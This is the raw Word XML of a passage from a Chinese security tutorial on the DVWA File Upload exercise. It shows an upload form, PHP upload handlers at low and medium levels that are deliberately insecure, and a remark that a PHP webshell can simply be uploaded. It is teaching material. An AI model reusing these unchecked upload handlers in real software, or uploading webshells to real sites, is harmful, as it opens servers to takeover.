                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>} ?&gt; ……</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="-11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&lt;form method="post" enc</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>type="multipart/form-data" name=" form1"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342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&lt;input type="file" name="file1" /&gt;&lt;br /&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:left="63"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&lt;input type="submit" value="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上传文件</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>" /&gt;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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下面是一个简单的文件上传例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="exact"/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  <w:lang w:eastAsia="zh-CN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278" type="#_x0000_t202" style="width:319.25pt;height:5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ind w:left="63"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="48" w:name="《DVWA的分析与测试7(File_Upload)》"/>
                  <w:bookmarkStart w:id="49" w:name="_bookmark23"/>
                  <w:bookmarkEnd w:id="48"/>
                  <w:bookmarkEnd w:id="49"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>&lt;input type="hidden" name="MAX_FILE_SIZE" value="1024" /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&gt;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&lt;/form&gt;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spacing w:line="306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这个例子没有检验文件后缀，可以上传任意文件，很明显的上传漏洞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"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN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32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>的分析与测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="-90"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>7(File Upload</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="4035"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s9258" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:37.2pt;width:320.3pt;height:324.2pt;z-index:4504;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1797,744" coordsize="6406,6484">
            <v:rect id="_x0000_s9277" style="position:absolute;left:1797;top:744;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9276" style="position:absolute;left:1797;top:1104;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9275" style="position:absolute;left:1797;top:1464;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9274" style="position:absolute;left:1797;top:1824;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9273" style="position:absolute;left:1797;top:2185;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9272" style="position:absolute;left:1797;top:2545;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9271" style="position:absolute;left:1797;top:2905;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9270" style="position:absolute;left:1797;top:3265;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9269" style="position:absolute;left:1797;top:3626;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9268" style="position:absolute;left:1797;top:3986;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9267" style="position:absolute;left:1797;top:4346;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9266" style="position:absolute;left:1797;top:4706;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9265" style="position:absolute;left:1797;top:5066;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9264" style="position:absolute;left:1797;top:5427;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9263" style="position:absolute;left:1797;top:5787;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9262" style="position:absolute;left:1797;top:6147;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9261" style="position:absolute;left:1797;top:6507;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9260" style="position:absolute;left:1797;top:6868;width:6385;height:360" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s9259" type="#_x0000_t202" style="position:absolute;left:1797;top:744;width:6406;height:6484" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="318" w:lineRule="exact"/>
                      <w:ind w:right="18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&lt;?php</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="360" w:lineRule="exact"/>
                      <w:ind w:left="229" w:right="3348"/>
                      <w:jc w:val="center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if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(isset($_POST['Upload'])) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                      <w:ind w:right="18" w:firstLine="744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sz w:val="21"/>
                      </w:rPr>
                      <w:t>$target_path = DVWA_WEB_PAGE_TO_ROOT."</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>hackable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>/ uploads/";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="360" w:lineRule="exact"/>
                      <w:ind w:right="36" w:firstLine="744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sz w:val="21"/>
                      </w:rPr>
                      <w:t>$target_path = $target_</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>path .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</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>basename(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$_FILES['uploa ded']['name']);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="342" w:lineRule="exact"/>
                      <w:ind w:left="747" w:right="-7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if(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>!move_uploaded_file($_FILES['uploaded']['tmp_name'],</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="361" w:lineRule="exact"/>
                      <w:ind w:left="63" w:right="18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sz w:val="21"/>
                      </w:rPr>
                      <w:t>$target_path)) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="361" w:lineRule="exact"/>
                      <w:ind w:left="994" w:right="18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echo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'&lt;pre&gt;';</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                      <w:ind w:left="994" w:right="1616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echo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'Your image was not uploaded.'; echo '&lt;/pre&gt;';</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="342" w:lineRule="exact"/>
                      <w:ind w:left="869" w:right="18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sz w:val="21"/>
                      </w:rPr>
                      <w:t>} else {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="360" w:lineRule="exact"/>
                      <w:ind w:left="994" w:right="18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echo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'&lt;pre&gt;';</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                      <w:ind w:left="994" w:right="1002"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>echo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$target_path . </w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> succesfully</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> uploaded!'; echo '&lt;/pre&gt;';</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="342" w:lineRule="exact"/>
                      <w:ind w:left="744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w w:val="99"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>}</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="361" w:lineRule="exact"/>
                      <w:ind w:left="497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w w:val="99"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>}</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:right="18"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>?&gt;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微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>信息来源于：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeSec Team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>直接看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/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417" w:right="2669"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:shape id="_x0000_s9257" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:40.95pt;width:319.25pt;height:486.3pt;z-index:4528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spacing w:line="360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(isset($_POST['Upload'])) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="-3" w:firstLine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$target_path = DVWA_WEB_PAGE_TO_ROOT."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hackable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/ uploads/";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="77" w:firstLine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$target_path = $target_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path .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basename(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$_FILES['uploa ded']['</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>name']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342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$uploaded_name =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'uploaded']['name'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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$uploaded_type =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'uploaded']['type'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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$uploaded_size =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'uploaded']['size'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="-3" w:firstLine="74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(($uploaded_type == "image/jpeg") &amp;&amp; ($uploaded_s ize &lt; 100000)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="343" w:lineRule="exact"/>
                    <w:ind w:left="99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!move_uploaded_file($_FILES['uploaded</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>']['tmp_nam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e'], $target_path)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241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'&lt;pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241" w:right="1348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'Your image was not uploaded.'; echo '&lt;/pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="1119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} else {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241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'&lt;pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241" w:right="73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$target_path .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' succesfully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uploaded!'; echo '&lt;/pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="343" w:lineRule="exact"/>
                    <w:ind w:left="1241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1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74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else{</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="99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'&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360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49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?&gt;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</w:rPr>
        <w:t>可谓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远古时代的代码了，直接上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>马</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia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看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId54"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="100"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="56"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:shape id="_x0000_s9256" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:22.95pt;width:319.25pt;height:540.3pt;z-index:4552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(isset($_POST['Upload'])) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="-3" w:firstLine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$target_path = DVWA_WEB_PAGE_TO_ROOT."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hackable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/ uploads/";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="77" w:firstLine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$target_path = $target_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path .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basename(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$_FILES['uploa ded']['name']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342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$uploaded_name =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'uploaded']['name'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="115" w:firstLine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 xml:space="preserve">$uploaded_ext =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substr(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$uploaded_name, strrpos($upl oaded_name, '.') + 1);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342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$uploaded_size =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'uploaded']['size'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="744" w:right="-9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(($uploaded_ext == "jpg" || $uploaded_ext == "JPG" ||</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:firstLine="62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$uploaded_ext == "jpeg" || $uplo</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>aded_ext == "JPEG") &amp;&amp; ($u ploaded_size &lt; 100000)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){</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="58" w:firstLine="993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w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>if(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">!move_uploaded_file($_FILES['uploaded']['tmp_nam </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>e'], $target_path)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="1241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'&lt;pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241" w:right="1348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'Your image was not uploaded.'; echo '&lt;/pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:right="3489"/>
                    <w:jc w:val="center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} else {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241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'&lt;pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1241" w:right="73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$target_path .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'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> succesfully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uploaded!'; echo '&lt;/pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="344" w:lineRule="exact"/>
                    <w:ind w:left="1241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74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else{</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="994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'&lt;pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="994" w:right="1595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'Your image was not uploaded.'; echo '&lt;/pre&gt;';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="744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1" w:lineRule="exact"/>
                    <w:ind w:left="49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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>级代码依然是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白名单思路过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑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tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:before="56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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
